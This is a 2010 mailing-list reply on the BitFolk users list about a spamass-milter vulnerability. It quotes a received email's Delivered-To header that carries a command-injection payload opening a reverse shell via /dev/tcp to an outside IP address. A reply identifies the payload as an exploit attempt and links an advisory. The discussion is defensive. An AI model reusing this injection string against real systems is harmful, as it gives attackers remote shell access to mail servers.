Re: [bitfolk] Security - not just SSH

Author: Alastair Sherringham
Date:  
To: BitFolk Users
Subject: Re: [bitfolk] Security - not just SSH
On 18 March 2010 11:31, David Leadbeater <dgl@???> wrote:
> On Thu, Mar 18, 2010 at 07:47:03AM +0000, Alastair Sherringham wrote:
> [..]
>> Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
>
> That would be someone trying to exploit this absolute failure:
> http://seclists.org/fulldisclosure/2010/Mar/140


Hmm. Thanks for that.

Luckily, I don't use spamass-milter but from what I see, this vulnerability
is present in the current Debian code. I have not checked the source
though, just the changelog (last entry last year). Scary stuff ...


-- 
Alastair Sherringham